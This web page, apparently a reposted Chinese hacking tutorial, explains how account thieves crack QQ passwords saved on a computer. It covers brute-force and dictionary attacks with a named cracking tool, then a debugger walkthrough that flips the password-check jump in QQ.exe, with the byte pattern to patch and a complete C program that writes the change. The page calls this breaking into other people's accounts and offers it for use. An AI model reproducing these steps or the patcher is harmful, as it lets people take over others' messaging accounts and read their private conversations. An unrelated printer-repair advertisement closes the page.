|
|
 QQ本地密码验证破解,快来看密码破解! |
|
|
| |
“本地破解”是指盗号者在本机中进行的QQ破解操作。这种破解方式分为两种情况:一种是盗号者所使用的电脑曾经登录过要破解的QQ号;另一种是别人的电脑中曾经登录过所要破解的QQ号,而盗号者通过黑客手段把相关的登录信息文件头了过来(在此我们不谈如何去偷,只假设盗号者已经获得了QQ的相关信息文件)。
本地破解的奥秘
QQ在使用时,会将用户的帐号、密码 、好友列表、个人信息和聊天记录等保存在本地电脑的QQ安装目录中(默认为C:\Program Files\Tecent),并且按照QQ安装目录分类。对于QQ密码的本地破解,其实就是破解QQ登录后保存在本地硬盘上的密码信息文件。
虽说这些文件都是经过专业加密处理的,但依然有人开发出了能够读取其内容的破解软件(连微软老大的Windows操作系统都逃脱不了被破解的命运,更何况小小的QQ)。
本地破解的原理和方法
面对经过加密的QQ密码信息文件,大多数的破解软件都采用了相同的工作原理来破解,那就是——穷举法!也就是我们常说的暴力破解。从理论上讲,只要穷举键盘上可以输入的所有字符串,就肯定能找到所需的QQ密码。破解软件采用穷举法来破解QQ密码,就是把密码中所有可能出现的字母或字符按照一定的算法进行排列组合,直到找到一组与密码完全匹配的字符序列(这种破解方法绝对有效,就是太费时间,有时所需时间甚至到了离谱的程度)
简单的QQ密码暴力破解软件采用顺序递增的算法,举一个简单的例子,比如一个QQ的密码假设是“1234”,在破解它时就可以设定密码的猜测范围是所有的数字。当破解软件运算时,就会以“0”为密码进行猜测比较,如果“0”合适则破解成功,如果不合适就尝试以“1”为密码进行猜测比较,还不合适就以“2”为密码猜测比较……依此类推,直到找出正确的密码。这种破解算法对猜测范围的准确性要求较高,并且非常耗时,破解效率极为低下。有时一个包含字母、数字和符号的8位数QQ密码,在一台P4电脑上连续工作一个月也不一定能够算出来。当破解时间长得不可接受时,就可以认为此破解是失败的。
好一点的QQ密码暴力破解软件都是采用外挂“字典”的方式。注意,这里的“字典”可不是我们平时用的《现代汉语词典》或《英文词典》,它其实是一个文本文件,内容是由若干字符串组成的列表(这个列表是根据人们使用密码的习惯和规律精心编制出来的)。这样的“字典”可以用字典生成软件自动生成,也可以手动编制和添加。一般的字典生存成软件都能够自动生成包括生日、电话或英文名等常见密码的“字典”内容,不过这种“字典”存在容量大、内容单一和不灵活的确定。因此,有经验的破解者都会采用先自动生成,再手工修改的方法来制作一个比较“聪明”的字典,或者直接从网上下载现成的“字典”。有了满意的“字典”后,在解密时只需把“字典”挂在破解软件商,就能在相对较短的时间内破解QQ密码。
实战本地破解
下面以网上流行的一款叫“画蝶”的QQ密码暴力破解软件为例,在默认“字典”中进行破解。
这款软件可以同时破解本地的多个QQ号码。首先,输入要破解的QQ号码范围(软件默认探测101511~1200000之间的QQ号码),假设要破解的QQ号码为“1234567”,结束QQ号码也为“1234567”;然后,按任意键进行密码探测(即调用其文件夹中的“字典”文件password.ini进行对比探测),软件可随时显示探测的结果及相关信息;最后,软件探测结束,破解出来的QQ密码就自动记录在result.txt文件中了,打开即可看到。
要想获得更好的破解效果,可以手动更新password.ini字典文件。要用记事本打开它,填入你认为最有可能的QQ密码内容就行了。
QQ本地密码验证破解
使用工具:SoftIce,UE,W32Dasm
跟踪过程:
1,在SI中断点 bpx messageboxa 对输错密码后弹出的MessageBox进行拦截.
2,第一步中当然能拦到,接着按F11看何处调用了Messageboxa,再设断点,并用此方法一直向上找.
3,用2的方法,直到找到一个断点,不管输入的密码正确与否这个断点都能起做用,(由下向上找到的第一个这样的断点),在本例中是:00404F2(此时QQ开着).
...
00404EC: CALL [EDI+20]
00404EF: TEST,EAX,EAX
00404F1: POP EDI
00404F2: JZ 00404581 这是关键处,输入密码正确后就跳,不正确时不跳.
...
那么对此处修改即可了.
修改:用W32DASM打开QQ.EXE,找到00404F2处,看到:
...
JE 0
0404581 (为什么是JE,不是JZ了,偶也没搞明白,菜啊~ ^_^)
...
其对应的OPCODE是: 57 20 85 C0 5F 0F 84 89
用UE打开QQ.exe查找"57 20 85 C0 5F 0F 84 89",并改为"57 20 85 C0 5F 0F 85 89",即把JE指令,改成了JNE指令,并保存.这时再打开QQ,不用输密码即可进入随便一QQ了.
用任何一个编程语言做个小程序,读取从文件头开始处偏移处的字节,如果为0x84,则修改为0x85就可以了。
#include "stdio.h"
main()
{
FILE *fp;
printf("QQ Local Login Tools\n\n");
printf("Crack: Wing QQ:6465660\n");
printf("Code : ccrun QQ:165332\n\n");
fp=fopen("QQ.exe","rb+");
if(!fp)
{
printf("Not Found QQ.exe!\n");
exit(0);
}
fseek(fp,0x54f4,0); /*此地址针对QQ2003 Preview 1,如果是QQ1230的,则地址为0x44F3*/
if(fgetc(fp)==0x84) /* OPCode:JE */
{
fputc(0x85,fp); /* OPCode:JNE */
printf("Cracked Success!\nPress any key to conitnue...");
}
else
printf("QQ Version Error!\nPress any key to continue...");
fclose(fp);
getch();
}
//完
|
|
| 发布日期:2019/11/23 |
| 宜昌打印机维修 复印机 一体机上门维修热线:13677173728 邢师傅 0717-6736581 |
|
